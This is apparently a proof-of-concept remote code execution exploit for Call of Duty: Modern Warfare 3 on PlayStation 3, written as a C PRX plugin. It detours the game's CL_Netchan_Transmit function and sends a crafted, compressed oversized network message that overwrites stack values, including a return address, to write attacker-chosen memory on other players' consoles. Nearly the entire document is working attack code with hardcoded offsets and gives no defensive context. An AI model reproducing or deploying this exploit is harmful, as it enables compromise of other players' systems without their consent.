MW3 RCE Poc By Sabotage

1. #include <cellstatus.h>
2. #include <sys/prx.h>
3. #include <time.h>
4. #include <fastmath.h>
5. #include <ppu_intrinsics.h>
6. #include <stdarg.h>
7. #include <stddef.h>
8.  
9. #include <sys/prx.h>
10. #include <sys/syscall.h>
11. #include <sys/ppu_thread.h>
12. #include <sys/sys_time.h>
13. #include <sys/time_util.h>
14. #include <sys/timer.h>
15. #include <sys/types.h>
16.  
17. #include <sys/socket.h>
18. #include <netinet\in.h>
19. #include <arpa\inet.h>
20. #include <netdb.h>
21. #include <cell\pad\libpad.h>
22. #include <sys/process.h>
23. #include <sys/memory.h>
24.  
25. SYS_MODULE_INFO( MW3_RCE, 0, 1, 1);
26. SYS_MODULE_START( _MW3_RCE_prx_entry );
27. SYS_MODULE_STOP(_MW3_RCE_prx_stop);
28.  
29. /*
30. Credits:
31. Gamer7112 for bring my attention to this
32. momo5502 for originally making a post showing this off.
33. Sabotage finding the exploit and creating the poc
34. */
35.  
36. int RestoreHook[4];
37.  
38.  
39. extern "C" {
40.     void *_sys_memset(void * ptr, void* value, size_t num);
41. }
42.  
43. #define memset          _sys_memset
44.  
45. struct msg_t
46. {
47.     int overflowed;
48.     int readOnly;
49.     char* data;
50.     char* splitData;
51.     int maxsize;
52.     int cursize;
53.     int splitSize;
54.     int readcount;
55.     int bit;
56.     int lastEntityRef;
57.     int targetLocalNetID;
58.     int useZlib;
59. };
60.  
61. #define TOC 0x72DCE8
62.  
63. struct opd_s_o
64. {
65.     unsigned int sub;
66.     unsigned int toc;
67. };
68.  
69. opd_s_o MSG_WriteBitsCompress_t = { 0x001FBFC8, TOC };
70. int(*MSG_WriteBitsCompress)(bool trainHuffman, const char *from, char *to, int size) = (int(*)(bool trainHuffman, const char *from, char *to, int size))&MSG_WriteBitsCompress_t;
71.  
72. opd_s_o MSG_Init_t = { 0x001FBC78, TOC };
73. int(*MSG_Init)(msg_t* msg, char* buffer, int size) = (int(*)(msg_t* msg, char* buffer, int size))&MSG_Init_t;
74.  
75. opd_s_o MSG_WriteData_t = { 0x001FC128, TOC };
76. int(*MSG_WriteData)(msg_t* msg, unsigned char* data, int size) = (int(*)(msg_t* msg, unsigned char* data, int size))&MSG_WriteData_t;
77.  
78. int CL_Netchan_TransmitStub(...)
79. {
80.     __asm("li %r3, 0x332;");
81. }
82.  
83.  
84.  
85. int CL_Netchan_Transmit(int netchan, unsigned char* buffer, int size, int unk)
86. {
87.     if (*(int*)0x10055000 == 2)
88.     {
89.         msg_t message;
90.         memset(&message, 0, sizeof(msg_t));
91.  
92.         char MessageBuffer[0x1000];
93.         char DataToBeSent[0x1000];
94.         memset(MessageBuffer, 0, 0x1000);
95.         memset(DataToBeSent, 0, 0x1000);
96.  
97.         MSG_Init(&message, MessageBuffer, 0x1000);
98.         MSG_WriteData(&message, buffer, 0x9);
99.  
100.         memset(DataToBeSent, 0, 0x840 + 0x9C);
101.  
102.         int* a = (int*)&DataToBeSent[0x808];
103.  
104.         a[1] = *(int*)(0x10055014); //value
105.         a[3] = *(int*)(0x10055010); //address
106.  
107.         int* r = (int*)&DataToBeSent[0x820];
108.  
109.         r[3] = 0xCAD8C;
110.  
111.         r[35] = 0x1F6E58;
112.         r[36] = 0xAAAAAAAA;
113.  
114.         MSG_WriteData(&message, (unsigned char*)DataToBeSent, 0x840 + 0x9C);
115.  
116.         int CompressedSize = MSG_WriteBitsCompress(0, &message.data[0x9], &message.data[0x9], message.cursize - 0x9);
117.  
118.         *(int*)0x10055000 = 0;
119.  
120.         return CL_Netchan_TransmitStub(netchan, (unsigned char*)message.data, CompressedSize, unk);
121.     }
122.  
123.     return CL_Netchan_TransmitStub(netchan, buffer, size, unk);
124.  
125. }
126.  
127.  
128.  
129. int sys_dbg_read_process_memory(uint64_t address, void* data, size_t size) {
130.     system_call_4(904, (uint64_t)sys_process_getpid(), address, size, (uint64_t)data);
131.     return_to_user_prog(int);
132. }
133.  
134. int sys_dbg_write_process_memory(uint64_t address, void* data, size_t size) {
135.     system_call_4(905, (uint64_t)sys_process_getpid(), address, size, (uint64_t)data);
136.     __dcbst((void*)address);
137.     __sync();
138.     __isync();
139.     return_to_user_prog(int32_t);
140. }
141.  
142. void DetourFunction(int address, void(*hookFunc), void(*stubFunc)) {
143.     int StubData[8], FuncData[4];
144.  
145.     int hook_address = hookFunc != NULL ? *(int*)hookFunc : 0;
146.     int stub_address = stubFunc != NULL ? *(int*)stubFunc : 0;
147.  
148.     if (stub_address) {
149.         int branchAddr = address + 0x10;
150.         StubData[0] = 0x3D600000 + ((branchAddr >> 16) & 0xFFFF) + (branchAddr & 0x8000 ? 1 : 0);
151.         StubData[1] = 0x396B0000 + (branchAddr & 0xFFFF);
152.         StubData[2] = 0x7D6903A6;
153.         StubData[7] = 0x4E800420;
154.         sys_dbg_read_process_memory(address, &StubData[3], 0x10);
155.         sys_dbg_write_process_memory(stub_address, StubData, 0x20);
156.     }
157.  
158.     if (hook_address) {
159.         FuncData[0] = 0x3D600000 + ((hook_address >> 16) & 0xFFFF) + (hook_address & 0x8000 ? 1 : 0);
160.         FuncData[1] = 0x396B0000 + (hook_address & 0xFFFF);
161.         FuncData[2] = 0x7D6903A6;
162.         FuncData[3] = 0x4E800420;
163.         sys_dbg_write_process_memory(address, FuncData, 0x10);
164.     }
165. }
166.  
167.  
168.  
169. extern "C" int _MW3_RCE_prx_entry(void)
170. {
171.     sys_dbg_write_process_memory((uint64_t)RestoreHook, (void*)0xDE810, 0x10);
172.  
173.     DetourFunction(0xDE810, CL_Netchan_Transmit, CL_Netchan_TransmitStub);
174.  
175.     return SYS_PRX_RESIDENT;
176. }
177.  
178.  
179. extern "C" int _MW3_RCE_prx_stop(void)
180. {
181.     sys_dbg_write_process_memory((uint64_t)0xDE810, (void*)RestoreHook, 0x10);
182.  
183.  
184.     return SYS_PRX_RESIDENT;
185. }